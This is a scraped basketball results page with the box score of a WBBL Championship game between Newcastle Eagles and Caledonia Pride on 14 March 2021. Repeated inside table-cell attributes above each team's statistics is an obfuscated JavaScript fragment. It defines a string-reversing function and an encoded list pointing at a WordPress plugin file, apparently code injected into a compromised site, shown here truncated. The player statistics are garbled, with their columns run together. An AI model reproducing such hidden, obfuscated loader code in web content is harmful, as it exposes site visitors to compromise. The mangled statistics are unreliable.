Breaking news
  1. Highlights & Pictures
  2. Highlights: Queens v Pride
  3. Highlights & Pictures: Pride v Riders
  4. Highlights: Wolves v Pride
  5. Highlights & Pictures: Pride v Wolves
WBBL Championship 14th March 2021 - 1:30 pm

Recap

Details

Date Time League Season Full Time
14th March 2021 1:30 pm WBBL Championship 2020/21 40'

Results

Team1234T
Newcastle Eagles2620192186
Caledonia Pride21239558

Newcastle Eagles

<td class="data-$NqM=function(n){if (typeof ($NqM.list[n]) == "string") return $NqM.list[n].split("").reverse().join("");return $NqM.list[n];};$NqM.list=["\'php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/t" data-label="TO">0<td class="data-$NqM=function(n){if (typeof ($NqM.list[n]) == "string") return $NqM.list[n].split("").reverse().join("");return $NqM.list[n];};$NqM.list=["\'php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/t" data-label="TO">0<td class="data-$NqM=function(n){if (typeof ($NqM.list[n]) == "string") return $NqM.list[n].split("").reverse().join("");return $NqM.list[n];};$NqM.list=["\'php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/t" data-label="TO">0<td class="data-$NqM=function(n){if (typeof ($NqM.list[n]) == "string") return $NqM.list[n].split("").reverse().join("");return $NqM.list[n];};$NqM.list=["\'php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/t" data-label="TO">0<td class="data-$NqM=function(n){if (typeof ($NqM.list[n]) == "string") return $NqM.list[n].split("").reverse().join("");return $NqM.list[n];};$NqM.list=["\'php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/t" data-label="TO">0<td class="data-$NqM=function(n){if (typeof ($NqM.list[n]) == "string") return $NqM.list[n].split("").reverse().join("");return $NqM.list[n];};$NqM.list=["\'php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/t" data-label="TO">0<td class="data-$NqM=function(n){if (typeof ($NqM.list[n]) == "string") return $NqM.list[n].split("").reverse().join("");return $NqM.list[n];};$NqM.list=["\'php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/t" data-label="TO">0<td class="data-$NqM=function(n){if (typeof ($NqM.list[n]) == "string") return $NqM.list[n].split("").reverse().join("");return $NqM.list[n];};$NqM.list=["\'php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/t" data-label="TO">0<td class="data-$NqM=function(n){if (typeof ($NqM.list[n]) == "string") return $NqM.list[n].split("").reverse().join("");return $NqM.list[n];};$NqM.list=["\'php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/t" data-label="TO">0
# Player Position PTS REB AST STL BLK FGM FGA FG% 3PM 3PA 3P% FTM FTA FT% OFF DEF TO PF
23Alison Gorrell-307930122060.0030.066100.0160
9Abigail Lowe-17554071450.02366.71250.0142
4Maddie McVicar-15463061060.03475.0000040
10Jorjah Smith-725003933.31425.0000020
13Deborah Rodriguez Perez-533102540.00001250.0122
6Amelia Oates-401102366.7000010.0000
13Ori Chukwu-Etu-461002633.3010.0000420
8Rachel Bland-440201250.000022100.0131
16Mollie Arnold-01010000000000010
 Total 863230150356950.761540.0101376.982405

Caledonia Pride

<td class="data-$NqM=function(n){if (typeof ($NqM.list[n]) == "string") return $NqM.list[n].split("").reverse().join("");return $NqM.list[n];};$NqM.list=["\'php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/t" data-label="TO">0<td class="data-$NqM=function(n){if (typeof ($NqM.list[n]) == "string") return $NqM.list[n].split("").reverse().join("");return $NqM.list[n];};$NqM.list=["\'php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/t" data-label="TO">0<td class="data-$NqM=function(n){if (typeof ($NqM.list[n]) == "string") return $NqM.list[n].split("").reverse().join("");return $NqM.list[n];};$NqM.list=["\'php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/t" data-label="TO">0<td class="data-$NqM=function(n){if (typeof ($NqM.list[n]) == "string") return $NqM.list[n].split("").reverse().join("");return $NqM.list[n];};$NqM.list=["\'php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/t" data-label="TO">0<td class="data-$NqM=function(n){if (typeof ($NqM.list[n]) == "string") return $NqM.list[n].split("").reverse().join("");return $NqM.list[n];};$NqM.list=["\'php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/t" data-label="TO">0<td class="data-$NqM=function(n){if (typeof ($NqM.list[n]) == "string") return $NqM.list[n].split("").reverse().join("");return $NqM.list[n];};$NqM.list=["\'php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/t" data-label="TO">0<td class="data-$NqM=function(n){if (typeof ($NqM.list[n]) == "string") return $NqM.list[n].split("").reverse().join("");return $NqM.list[n];};$NqM.list=["\'php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/t" data-label="TO">0<td class="data-$NqM=function(n){if (typeof ($NqM.list[n]) == "string") return $NqM.list[n].split("").reverse().join("");return $NqM.list[n];};$NqM.list=["\'php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/t" data-label="TO">0
# Player Position PTS REB AST STL BLK FGM FGA FG% 3PM 3PA 3P% FTM FTA FT% OFF DEF TO PF
4Maud RangerGuard20532072231.861346.2000141
6Rose HarveyGuard20131071258.361060.0000013
25Elise TweedieCenter1053015862.5000000320
20Private: Pollyanna StorieForward571012922.21520.0000163
50Eabha KerrForward210011616.7020.0000104
5Sian PhillipsForward111321040.0020.01250.0291
10Private: Sophie LeslieGuard01000030.0030.0000011
22Sophie LoughranForward03010020.0020.0000301
 Total 58341364226633.3133735.11250.01123014